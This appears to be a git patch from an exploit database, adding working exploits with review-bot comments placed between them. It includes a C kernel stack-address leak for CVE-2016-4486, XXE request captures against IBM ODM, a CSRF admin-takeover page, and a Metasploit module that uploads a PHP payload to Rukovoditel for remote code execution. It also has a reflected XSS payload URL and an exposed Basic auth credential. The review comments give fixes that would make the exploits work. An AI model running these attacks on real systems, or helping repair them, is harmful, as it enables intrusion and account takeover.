From aedf107ce96e59f29b599736a8838ced6f07a680 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Thu, 20 Dec 2018 05:01:43 +0000 Subject: [PATCH] DB: 2018-12-20 12 changes to exploits/shellcodes MiniShare Server 1.3.2 - Remote Denial of Service MiniShare 1.3.2 - Remote Denial of Service MiniShare 1.5.5 - Local Buffer Overflow (SEH) MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (SEH) Linux Kernel 4.4 - 'rtnetlink' Stack Memory Disclosure PassFab RAR 9.3.2 - Buffer Overflow (SEH) LanSpy 2.0.1.159 - Local Buffer Overflow PDF Explorer 1.5.66.2 - Buffer Overflow (SEH) MiniShare HTTP 1.5.5 - Remote Buffer Overflow MiniShare 1.5.5 - Remote Buffer Overflow MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow Hotel Booking Script 3.4 - Cross-Site Request Forgery (Change Admin Password) Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit) Integria IMS 5.0.83 - 'search_string' Cross-Site Scripting Integria IMS 5.0.83 - Cross-Site Request Forgery Bolt CMS < 3.6.2 - Cross-Site Scripting Yeswiki Cercopitheque - 'id' SQL Injection IBM Operational Decision Manager 8.x - XML External Entity Injection Linux/x64 - Disable ASLR Security Shellcode (93 Bytes) --- exploits/linux/local/46006.c | 503 ++++++++++++++++++++++++++++ exploits/multiple/webapps/46017.txt | 48 +++ exploits/php/webapps/46010.html | 45 +++ exploits/php/webapps/46011.rb | 204 +++++++++++ exploits/php/webapps/46012.txt | 27 ++ exploits/php/webapps/46013.html | 41 +++ exploits/php/webapps/46014.txt | 37 ++ exploits/php/webapps/46015.txt | 19 ++ exploits/windows/local/46008.py | 59 ++++ exploits/windows/local/46009.py | 108 ++++++ exploits/windows/local/46016.py | 57 ++++ files_exploits.csv | 19 +- files_shellcodes.csv | 1 + shellcodes/linux_x86-64/46007.c | 85 +++++ 14 files changed, 1249 insertions(+), 4 deletions(-) create mode 100644 exploits/linux/local/46006.c create mode 100644 exploits/multiple/webapps/46017.txt create mode 100644 exploits/php/webapps/46010.html create mode 100755 
exploits/php/webapps/46011.rb create mode 100644 exploits/php/webapps/46012.txt create mode 100644 exploits/php/webapps/46013.html create mode 100644 exploits/php/webapps/46014.txt create mode 100644 exploits/php/webapps/46015.txt create mode 100755 exploits/windows/local/46008.py create mode 100755 exploits/windows/local/46009.py create mode 100755 exploits/windows/local/46016.py create mode 100644 shellcodes/linux_x86-64/46007.c diff --git a/exploits/linux/local/46006.c b/exploits/linux/local/46006.c new file mode 100644 index 000000000..0811bf731 --- /dev/null +++ b/exploits/linux/local/46006.c 
@@ -0,0 +1,503 @@ +/* + * [ Briefs ] + * - CVE-2016-4486 has discovered and reported by Kangjie Lu. + * - This is local exploit against the CVE-2016-4486. + * + * [ Tested version ] + * - Distro : Ubuntu 16.04 + * - Kernel version : 4.4.0-21-generic + * - Arch : x86_64 + * + * [ Prerequisites ] + * - None + * + * [ Goal ] + * - Leak kernel stack base address of current process by exploiting CVE-2016-4486. + * + * [ Exploitation ] + * - CVE-2016-4486 leaks 32-bits arbitrary kernel memory from uninitialized stack. + * - This exploit gets 61-bits stack base address among the 64-bits full address. + * remaining 3-bits is not leaked because of limitation of ebpf. + * - Full exploitation are performed as follows. + * + * 1. Spraying kernel stack as kernel stack address via running ebpf program. + * - We can spray stack up to 512-bytes by running ebpf program. + * - After this step, memory to be leaked will be filled with kernel stack address. + * 2. Trigger CVE-2016-4486 to leak 4-bytes which is low part of stack address. + * - After this step, stack address : 0xffff8800????????; (? is unknown address yet.) + * 3. Leak high 4-bytes of stack address. The leaking is done as one-by-one bit. why one-by-one? + * - CVE-2016-4486 allows to leak 4-bytes only, so that we always get low 4-bytes of stack address. + * - Then, How to overcome this challenge?? The one of possible answer is that + * do operation on high-4bytes with carefully selected value which changes low-4bytes. + * For example, Assume that real stack address is 0xffff880412340000; + * and, do sub operation. ==> 0xffff880412340000 - 0x0000000012360000 (selected value); + * The result will be "0xffff8803....." ==> Yap! low 4-bytes are changed!! and We can see this! + * The result makes us to know that high 4-bytes are smaller than 0x12360000; + * Then, We can keep going with smaller value. + * - The algorithm is quite similar to quick-search. + * 4. 
Unfortunately, ebpf program limitation stops us to leak full 64-bits. + * - 3-bits (bit[16], bit[15], bit[14]) are not leaked. + * - But, Since 3-bit is not sufficient randomness, It's very valuable for attacker. + * Bonus) Why do I use compat_sendmsg() instead of normal sendmsg()? + * - When I did spraying stack with normal sendmsg(), I couldn't spray up to memory to be leaked. + * - If I use compat-sendmsg(), The execution path will be different from normal sendmsg(). + * This makes me to spray it more far. + * + * [ Run exploit ] + * - $ gcc poc.c -o poc + * - $ ./poc + * .... + * .... + * leak stack address range : + * -----from : ffff88007f7e0000 + * --------to : ffff88007f7fc000 + * (Since we can get 61-bit address, Print the possible address range out.) + * + * [ Contact ] + * - jinb.park7@gmail.com + * - github.com/jinb-park + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define GPLv2 "GPL v2" +#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0])) + +#define INTERFACE_INDEX (0) +#define LEAK_OFFSET (28) + +/* + * BPF-based stack sprayer + */ +/* registers */ +/* caller-saved: r0..r5 */ +#define BPF_REG_ARG1 BPF_REG_1 +#define BPF_REG_ARG2 BPF_REG_2 +#define BPF_REG_ARG3 BPF_REG_3 +#define BPF_REG_ARG4 BPF_REG_4 +#define BPF_REG_ARG5 BPF_REG_5 +#define BPF_REG_CTX BPF_REG_6 +#define BPF_REG_FP BPF_REG_10 + +#define BPF_MOV32_REG(DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU | BPF_MOV | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) +#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) +#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 
OFF, \ + .imm = IMM }) +#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) +#define BPF_STX_ADD_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_STX | BPF_XADD | BPF_SIZE(SIZE),\ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) +#define BPF_MOV64_IMM(DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) +#define BPF_EXIT_INSN() \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_EXIT, \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = 0 }) +#define BPF_MOV64_REG(DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) +#define BPF_ALU64_IMM(OP, DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) +#define BPF_ALU64_REG(OP, DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +int bpf_(int cmd, union bpf_attr *attrs) +{ + return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); +} + +int prog_load(struct bpf_insn *insns, size_t insns_count) +{ + char verifier_log[100000]; + union bpf_attr create_prog_attrs = { + .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, + .insn_cnt = insns_count, + .insns = (uint64_t)insns, + .license = (uint64_t)GPLv2, + .log_level = 1, + .log_size = sizeof(verifier_log), + .log_buf = (uint64_t)verifier_log + }; + int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs); + int errno_ = errno; + errno = errno_; + if (progfd == -1) { + printf("bpf prog load error\n"); + exit(-1); + } + return progfd; +} + +int create_socket_by_socketpair(int *progfd) +{ + int socks[2]; + if (socketpair(AF_UNIX, SOCK_SEQPACKET, 
0, socks)) { + printf("socketpair error\n"); + exit(-1); + } + if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, progfd, sizeof(int))) { + printf("setsockopt error\n"); + exit(-1); + } + return socks[1]; +} + +int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) +{ + int progfd = prog_load(insns, insns_count); + return create_socket_by_socketpair(&progfd); +} + +#define NR_sendmsg_32 370 // for 32-bit + +typedef unsigned int compat_uptr_t; +typedef int compat_int_t; +typedef unsigned int compat_size_t; +typedef unsigned int compat_uint_t; + +struct compat_msghdr { + compat_uptr_t msg_name; /* void * */ + compat_int_t msg_namelen; + compat_uptr_t msg_iov; /* struct compat_iovec * */ + compat_size_t msg_iovlen; + compat_uptr_t msg_control; /* void * */ + compat_size_t msg_controllen; + compat_uint_t msg_flags; +}; +struct compat_iovec { + compat_uptr_t iov_base; + compat_size_t iov_len; +}; + +int sendmsg_by_legacy_call(int fd, unsigned int msg, int flags) +{ + int r = -1; + + asm volatile ( + "push %%rax\n" + "push %%rbx\n" + "push %%rcx\n" + "push %%rdx\n" + "push %%rsi\n" + "push %%rdi\n" + "mov %1, %%eax\n" + "mov %2, %%ebx\n" + "mov %3, %%ecx\n" + "mov %4, %%edx\n" + "int $0x80\n" + "mov %%eax, %0\n" + "pop %%rdi\n" + "pop %%rsi\n" + "pop %%rdx\n" + "pop %%rcx\n" + "pop %%rbx\n" + "pop %%rax\n" + : "=r" (r) + : "r"(NR_sendmsg_32), "r"(fd), "r"(msg), "r"(flags) + : "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi" + ); + + return r; +} + +#define COMPAT_SENDMSG +void trigger_proc(int sockfd) +{ +#ifdef COMPAT_SENDMSG + struct compat_msghdr *msg = NULL; + struct compat_iovec *iov = NULL; +#else + struct msghdr *msg = NULL; + struct iovec *iov = NULL; +#endif + char *buf = NULL; + int r; + + // allocate under-32-bit address for compat syscall + msg = mmap(0x70000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); + if (msg == MAP_FAILED) { + printf("mmap error : %d, %s\n", errno, strerror(errno)); + exit(0); + } 
+ buf = mmap(0x90000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); + if (buf == MAP_FAILED) { + printf("mmap error : %d, %s\n", errno, strerror(errno)); + exit(0); + } + iov = mmap(0xb0000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); + if (buf == MAP_FAILED) { + printf("mmap error : %d, %s\n", errno, strerror(errno)); + exit(0); + } + +#ifdef COMPAT_SENDMSG + iov->iov_base = (compat_uptr_t)buf; +#else + iov->iov_base = buf; +#endif + iov->iov_len = 128; + msg->msg_name = NULL; + msg->msg_namelen = 0; +#ifdef COMPAT_SENDMSG + msg->msg_iov = (compat_uptr_t)iov; +#else + msg->msg_iov = iov; +#endif + msg->msg_iovlen = 1; + msg->msg_control = NULL; + msg->msg_controllen = 0; + msg->msg_flags = 0; + +#ifdef COMPAT_SENDMSG + r = sendmsg_by_legacy_call(sockfd, (unsigned int)msg, 0); +#else + r = sendmsg(sockfd, msg, 0); +#endif + if (r < 0) { + printf("sendmsg error, %d, %s\n", errno, strerror(errno)); + exit(-1); + } +} + +int sockfds = -1; + +void stack_spraying_by_bpf(unsigned long val) +{ + int r; + + struct bpf_insn stack_spraying_insns[] = { + BPF_MOV64_REG(BPF_REG_3, BPF_REG_FP), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -val), + + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -368), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -376), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -384), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -392), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -400), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -408), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -416), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -424), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -432), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -440), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -448), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -456), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -464), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -472), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -480), + 
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -488), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -496), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -504), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -512), + + BPF_MOV64_IMM(BPF_REG_0, 0), + BPF_EXIT_INSN() + }; + + sockfds = create_filtered_socket_fd(stack_spraying_insns, ARRSIZE(stack_spraying_insns)); + if (sockfds < 0) + return; + + trigger_proc(sockfds); + close(sockfds); + //sleep(1); +} + +/* +28byte, 32byte including padding +struct rtnl_link_ifmap { + __u64 mem_start; + __u64 mem_end; + __u64 base_addr; + __u16 irq; + __u8 dma; + __u8 port; +};*/ + +// rtnl_fill_link_ifmap <-- rtnl_fill_ifinfo (symbol) + +struct { + struct nlmsghdr nh; + struct ifinfomsg ifm; + char attrbuf[512]; +} req; + +// Ubuntu 4.4.0-21-generic +#define RANGE_MIN_MASK ~((1<<16) | (1<<15) | (1<<14)) // and +#define RANGE_MAX_MASK ((1<<16) | (1<<15) | (1<<14)) // or + +int main(int argc, char **argv) +{ + unsigned char buf[65535]; + unsigned char map_buf[36] = {0,}; + struct nlmsghdr *nl_msg_ptr; + struct ifinfomsg *inf_msg_ptr; + struct rtnl_link_ifmap *map_ptr; + struct rtattr *rta_ptr; + int size, len, attr_len, offset; + int progfd; + unsigned int sub_val = 0; + unsigned int leak_value; + unsigned long leak_full_stack = 0; + unsigned int low_stack = 0; + int i; + + for (i=0; i<16; i++) { + int rtnetlink_sk = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE); + + memset(&req, 0, sizeof(req)); + + req.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg)); + req.nh.nlmsg_flags = NLM_F_DUMP | NLM_F_REQUEST; + req.nh.nlmsg_type = RTM_GETLINK; + req.nh.nlmsg_seq = 1; + + req.ifm.ifi_family = AF_UNSPEC; + req.ifm.ifi_index = INTERFACE_INDEX; + req.ifm.ifi_change = 0xffffffff; + + if (i == 0) + sub_val = 0; + else + sub_val += (1 << (32 - i)); + + stack_spraying_by_bpf((unsigned long)sub_val); + if (send(rtnetlink_sk, &req, req.nh.nlmsg_len, 0) < 0) { + printf("send error\n"); + goto out; + } + + while (1) { + if ((size = recv(rtnetlink_sk, 
buf, sizeof(buf), 0)) < 0) { + fprintf(stderr, "ERROR recv(): %s\n", strerror(errno)); + goto out; + } + + for (nl_msg_ptr = (struct nlmsghdr *)buf; size > (int)sizeof(*nl_msg_ptr);) { + len = nl_msg_ptr->nlmsg_len; + + if (nl_msg_ptr->nlmsg_type == NLMSG_ERROR) { + printf("NLMSG_ERROR\n"); + goto out; + } + else if (nl_msg_ptr->nlmsg_type == NLMSG_DONE) + break; + + if (!NLMSG_OK(nl_msg_ptr, (unsigned int)size)) { + printf("Not OK\n"); + goto out; + } + + attr_len = IFLA_PAYLOAD(nl_msg_ptr); + inf_msg_ptr = (struct ifinfomsg *)NLMSG_DATA(nl_msg_ptr); + rta_ptr = (struct rtattr *)IFLA_RTA(inf_msg_ptr); + + for (; RTA_OK(rta_ptr, attr_len); rta_ptr = RTA_NEXT(rta_ptr, attr_len)) { + if (rta_ptr->rta_type == IFLA_MAP) { + if (rta_ptr->rta_len != sizeof(map_buf)) { + printf("wrong size\n"); + goto out; + } + + memcpy(map_buf, RTA_DATA(rta_ptr), sizeof(map_buf)); + map_ptr = &map_buf; + leak_value = *(unsigned int *)(map_buf + LEAK_OFFSET); + printf("leak_value : %08x\n", leak_value); + break; + } + } + + size -= NLMSG_ALIGN(len); + nl_msg_ptr = (struct nlmsghdr *)((char *)nl_msg_ptr + NLMSG_ALIGN(len)); + } + + break; + } + + if (low_stack == 0) + low_stack = leak_value; + else + if (leak_value != low_stack) + sub_val &= (~(1 << (32 - i))); // clear bit + + memcpy((unsigned char *)&leak_full_stack + 4, &low_stack, 4); + memcpy((unsigned char *)&leak_full_stack, &sub_val, 4); + printf("[try-%d] stack address : %lx\n", i, leak_full_stack); +out: + close(rtnetlink_sk); + } + + printf("=======================================================================\n"); + printf("leak stack address range : \n"); + printf("-----from : %lx\n", leak_full_stack & RANGE_MIN_MASK); + printf("--------to : %lx\n", leak_full_stack | RANGE_MAX_MASK); + printf("======================================================================\n"); + + return 0; +} \ No newline at end of file 
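Review bot: The third mmap() in trigger_proc checks the wrong variable — after `iov = mmap(0xb0000, ...)` the guard repeats `if (buf == MAP_FAILED)`, so a failed mapping of iov is never detected and the following `iov->iov_base` store writes through MAP_FAILED; it should read `if (iov == MAP_FAILED)`. In prog_load, `int errno_ = errno; errno = errno_;` is a no-op and can be dropped. In main, `unsigned int leak_value;` has no initializer but is read after the recv loop even when no IFLA_MAP attribute was found, so it should start as `unsigned int leak_value = 0;` or that case should be handled explicitly. create_socket_by_socketpair also never closes socks[0] or the BPF program fd, and since stack_spraying_by_bpf is called on every iteration of the 16-round loop, both descriptors leak each round.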
diff --git a/exploits/multiple/webapps/46017.txt b/exploits/multiple/webapps/46017.txt
new file mode 100644
index 000000000..6feaf45dd
--- /dev/null
+++ b/exploits/multiple/webapps/46017.txt
@@ -0,0 +1,48 @@ +# Exploit Title: [XML External Entity Injection (XXE)] +# Date: [2018-12-18] +# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company] +# Vendor Homepage: [https://www-01.ibm.com/support/docview.wss?uid=ibm10744149] +# Version: [v8.6 - v8.7 - v8.8 - v8.9] (REQUIRED) +# Tested on: [Windows 10] +# CVE : [CVE-2018-1821] + +POC#1: Port Scanning: +====================== +POST /res/api/v1/ruleapps?csrf_token=kgwGZpsLIpCrCuS3s2mLS4%2BuXKM%3D HTTP/1.1 +Host: 172.25.28.35:9443 +Connection: close +Content-Length: 83 +Origin: https://172.25.28.35:9443 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 +Content-Type: application/xml +Accept: */* +Referer: https://172.25.28.35:9443/res/protected/rest.jsf +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: JSESSIONID=0000EKq5uAZFEICNv26D32qeVid:1c4i4k9om; LtpaToken2=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 + + + + + + +POC#2: Using External DTD File: +====================================== +POST /rest/bpm/monitor/events HTTP/1.1 +Host: 172.25.28.41:9445 +Connection: close +Cache-Control: max-age=0 +Authorization: Basic Ym1hZG1pbjpibWFkbWlu +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Content-Type: text/xml +SOAPAction: "CBE_FOR_EACH_TRANSACTION_REQUESTI" +Accept-Language: en-US,en;q=0.9 +Cookie: JSESSIONID=00002W7K2hStpCQu03vef0J3Lyt:1cd2vk5q4; com.ibm.wbimonitor.UserName=bmadmin; MUMLogoutURL=https://172.25.28.41:9445/mum/logout; LtpaToken2=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 +Content-Length: 99 + + + \ No newline at end of file 
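Review bot: The two request captures still carry an `Authorization: Basic …` value and live-looking `JSESSIONID` cookies, while `LtpaToken2` has already been masked; the same redaction should be applied to those fields, since they appear to be credentials from the author's test environment. The bodies announced by `Content-Length: 83` and `Content-Length: 99` are not visible in the hunk as rendered here, so a reader cannot tell what the two POC requests actually send — if the XML bodies were lost in publishing, the file should say so or include them as an escaped listing.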
diff --git a/exploits/php/webapps/46010.html b/exploits/php/webapps/46010.html new file mode 100644 index 000000000..016ff12ec --- /dev/null +++ b/exploits/php/webapps/46010.html @@ -0,0 +1,45 @@ +# Exploit Title: Admin Account take over Via CSRF +# Google Dork: N/A +# Date: 17-12-2018 +# Exploit Author: Sainadh Jamalpur +# Vendor Homepage: https://www.phpjabbers.com/hotel-booking-system/ +# Software Link: https://demo.phpjabbers.com/1545033057_422/index.php?controller=pjAdmin&action=pjActionIndex +# Version: 3.4 +# Tested on: Windows x64/ Kali linux x64 +# CVE : N/A + +************************Description:********************** + +The online hotel reservation system is built in PHP and uses MySQL to +store data. The script provides a powerful room booking and reservation +management functionality and allows you to install a clear +call-to-action tool on your hotel website which will impact conversions +and increase bookings. Our room booking system is highly customizable +and compatible with various website types. + +*************************Vulnerability Description:**************** + An attacker can take the admin account via sending the Malicious link +to the authenticated user then the Victim clicks on the malicious link +then the admin password is change + +************************************ +PoC************************************** + + + + + +
+ + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/46011.rb b/exploits/php/webapps/46011.rb new file mode 100755 index 000000000..225de6547 --- /dev/null +++ b/exploits/php/webapps/46011.rb 
@@ -0,0 +1,204 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'uri' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize + super( + 'Name' => 'Rukovoditel Project Management/CRM 2.3.1 - +(Authenticated) Remote Code Execution', + 'Description' => %q{ + This module exploits a file upload vulnerability in Rukovoditel +PM/CRM version 2.3.1. + Application allows the user to upload a background image, and does +not perform extension checking exactly. + Application agrees to upload if "gif" file header is added to the +header of our payload file. + However, many file types do not have permission to work. +".htaccess" is blocking that. + it has file extension check as follows, + + There is no upper and lower case control. Therefore, the extension +of our file can be .pHp .Php .PhP and such. + The module is uploading by create a payload as above to get +Meterpreter session. 
+ }, + 'Author' => [ + 'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf +Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', ' +https://pentest.com.tr/exploits/Rukovoditel-Project-Management-CRM-2-3-1-Authenticated-Remote-Code-Execution.html'], + + ['CVE', '2018-20166'], + ], + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Rukovoditel PM/CRM <= 2.3.1', {}] + ], + 'DisclosureDate' => '14 Dec 2018', + 'Privileged' => false, + 'DefaultTarget' => 0 + ) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to i-doit', +'/']), + OptString.new('USER', [true, 'User to login with', 'admin']), + OptString.new('PASS', [true, 'Password to login with', +'password']), + ], self.class) + end +## +# Exploitation of Vulnerability +## + def exploit + + random_value = Rex::Text.rand_text_alpha(10) + sid_md5 = Digest::MD5.hexdigest random_value + print_status("sid = #{sid_md5}") + + cookie = "cookie_test=please_accept_for_session;" + " sid=" + sid_md5 + + res1 = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri, +"/index.php?module=users/login"), + 'cookie' => cookie, + }) + if not (res1 and res1.body =~ /form_session_token\" +value=\"([^\"]+)\"/) + return nil + end + token = $1 +## +# Authorized User Login +## + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, +"/index.php?module=users/login&action=login"), + 'cookie' => cookie, + 'vars_post' => { + "form_session_token" => token, + "username" => datastore['USER'], + "password" => datastore['PASS'] + + } + }) +## +# Login Control +## + + tok = send_request_cgi({ + 'method' => 'GET', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, +"/index.php?module=dashboard/"), + }) + + html = tok.body + if html =~ /Rukovoditel/ + print_good("Login Successful") + else + print_status("User information is incorrect. 
Login failed") + exit 0 + end +## +# Arbitrary ".pHp" file upload +## + + boundary = Rex::Text.rand_text_alphanumeric(29) + + data = "-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; +name=\"form_session_token\"\r\n" + data << "\r\n" + data << "{token}" + data << "\r\n-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; +name=\"CFG[LOGIN_PAGE_HEADING]\"\r\n" + data << +"\r\nPage-Heading\r\n-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; +name=\"CFG[LOGIN_PAGE_CONTENT]\"\r\n" + data << "\r\nPage-Desc\r\n-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; +name=\"APP_LOGIN_PAGE_BACKGROUND\"; filename=\"akkus.pHp\"\r\n" + data << "Content-Type: binary/octet-stream\r\n" + data << "\r\n" + data << "GIF89a;\n\n" + data << "\n\n" + data << payload.encoded + data << "\r\n-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; +name=\"CFG[APP_LOGIN_PAGE_BACKGROUND]\"\r\n" + data << "\r\n{upload_name}\r\n" + data << "-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; +name=\"CFG[LOGIN_PAGE_HIDE_REMEMBER_ME]\"\r\n" + data << "\r\n0\r\n-----------------------------{boundary}--\r\n" + + res2 = send_request_cgi({ + 'method' => 'POST', + 'data' => data, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; +boundary=---------------------------{boundary}', + 'cookie' => cookie, + }, + 'uri' => normalize_uri(target_uri, +"/index.php?module=configuration/save&redirect_to=configuration/login_page") + + }) + + +## +# Informations +## + print_status("#{peer} - Uploading in progress...") + print_good("Upload Successful") +## +# Calling Shell File Name +## + shellc = send_request_cgi({ + 'method' => 'GET', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, +"/index.php?module=configuration/login_page"), + }) + + if not (shellc and shellc.body =~ 
/CFG_APP_LOGIN_PAGE_BACKGROUND\" +value=\"([^\"]+)\"/) + return nil + end + shelln = $1 + print_good("#{peer} - Payload uploaded as #{shelln}") + register_file_for_cleanup(shelln) +## +# Get Session +## + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri, "/uploads/", shelln), + }) + + end +end \ No newline at end of file diff --git a/exploits/php/webapps/46012.txt b/exploits/php/webapps/46012.txt new file mode 100644 index 000000000..17e4f04c1 --- /dev/null +++ b/exploits/php/webapps/46012.txt @@ -0,0 +1,27 @@ +# Exploit Title: Integria IMS 5.0.83 - Cross-Site Scripting +# Exploit Author: Javier Olmedo +# Website: https://hackpuntes.com +# Date: 2018-12-18 +# Google Dork: N/A +# Vendor: Artica ST +# Software Link: https://github.com/articaST/integriaims +# Affected Version: 5.0.83 and possibly before +# Patched Version: 5.0.84 +# Category: Web Application +# Platform: Windows +# Tested on: Win10x64 & Kali Linux +# CVE: 2018-19828 +# References: +# https://hackpuntes.com/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/ +# https://github.com/articaST/integriaims/commit/25d810b1c8e138e4b47d5cd14b2cd9b564f19b1e + +# 1. Technical Description: +# search_string parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks +# through a GET request in index.php resource. + +# 2. Proof Of Concept (PoC): +# On the main page, go to the search form and add the following payload +# '> + +# 3. Payload +# http://[PATH]/index.php?search_string=%27%3E%3Cscript%3Ealert(%27PoC%20CVE-2018-19828%27)%3C%2Fscript%3E \ No newline at end of file diff --git a/exploits/php/webapps/46013.html b/exploits/php/webapps/46013.html new file mode 100644 index 000000000..2e132ae7f --- /dev/null +++ b/exploits/php/webapps/46013.html 
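Review bot: The multipart body built in `exploit` never interpolates its placeholders — `{boundary}`, `{token}` and `{upload_name}` sit inside double-quoted strings without `#`, so the literal text `{token}` is sent as form_session_token, the `token` captured from the login page is unused, and the `boundary=` in the Content-Type header will not match the one in the body; each should be written as `#{boundary}`, `#{token}` and so on. `exit 0` on a failed login terminates the whole framework process rather than the module; the Msf idiom is `fail_with(Failure::NoAccess, 'Login failed')`. `res2` is never inspected before `print_good("Upload Successful")`, so an upload rejected by the server is still reported as a success. The TARGETURI description `'The base path to i-doit'` looks copied from another module and should name this application.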
